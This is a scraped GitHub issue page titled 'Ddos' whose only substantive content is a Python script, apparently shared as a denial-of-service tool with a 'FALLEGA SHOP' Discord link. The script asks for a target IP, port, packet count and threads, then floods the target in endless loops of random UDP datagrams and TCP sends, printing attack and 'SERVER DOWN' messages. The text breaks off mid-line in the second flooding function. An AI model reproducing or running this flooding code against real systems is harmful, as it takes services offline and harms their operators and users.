PYROFALLEGAHEDI1213 / hedifallega1213

FALLEGA
0 stars 0 forks source link

Ddos #1

Open PYROFALLEGAHEDI1213 opened 1 year ago

PYROFALLEGAHEDI1213 commented 1 year ago

Ddos

PYROFALLEGAHEDI1213 commented 1 year ago

1.8 KB import random import socket import threading

print("\033[92m") print(""" Tools by:

█████ ████ █ █ ██████ ███
█ █ █ █ █ █ █ █████ █ █ █ █ ██████ █ █
█ ███████ █ █ █ █ █ █ █ █ ██████ ██████ ██████ ████

Creat by ELDOB#7040 FALLEGA SHOP https://discord.gg/yhHfTrRDMy """) print("\033[97m") ip= str(input(" ip :")) port= int(input(" port :")) choice = str(input(" Ddos Attack?? (y/n):")) times= int(input(" Paket :")) threads= int(input(" threads :")) def run(): data = random._urandom(1024) i = random.choice(("[-]","[•]","[×]")) while True: try: s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) addr = (str(ip),int(port)) for x in range(times): s.sendto(data,addr) print(i +" FALLEGA TEAM DDOS ATTACK!!!") except: print("[!] SERVER DOWN!!!")

def run2(): data = random._urandom(16) i = random.choice(("[-]","[•]","[×]")) while True: try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((ip,port)) s.send(data) for x in range(times): s.send(data) print(i +" FALLEGA TEAM DDOS ATTACK!!!") except: s.close() print("[*] SERVER